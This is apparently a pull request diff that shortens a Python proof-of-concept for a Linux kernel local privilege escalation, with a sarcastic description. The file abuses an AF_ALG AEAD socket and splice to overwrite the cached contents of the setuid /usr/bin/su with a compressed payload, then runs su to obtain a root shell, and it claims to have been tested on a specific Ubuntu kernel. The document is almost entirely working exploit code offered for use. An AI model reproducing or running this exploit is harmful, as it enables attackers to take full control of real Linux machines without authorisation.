### PR TITLE
Golf harder (-20 bytes)

### DIFF
--- a/copy_fail_exp.py
+++ b/copy_fail_exp.py
@@ -1,10 +1,12 @@
 #!/usr/bin/env python3
-import os as g,zlib,socket as s
-def d(x):return bytes.fromhex(x)
+import os as g,zlib,socket
+d=bytes.fromhex
+n=g.splice
 def c(f,t,c):
- a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
- try:u.recv(8+t)
+ try:a=socket.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n(f,w,o,0);n(r,u.fileno(),o);u.recv(8+t)
  except:0
-f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+f=g.open("/usr/bin/su",0)
+i=0
+e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
 while i<len(e):c(f,i,e[i:i+4]);i+=4
 g.system("su")


### PR DESCRIPTION
Thanks for this clean and well documented PoC that really helps defenders understand the root cause of the vulnerability. /s

This commit refactors the PoC to remove 20 unneeded bytes, saving disk space. Tested on Ubuntu 24.04.4 LTS (Kernel version 6.8.0-110-generic).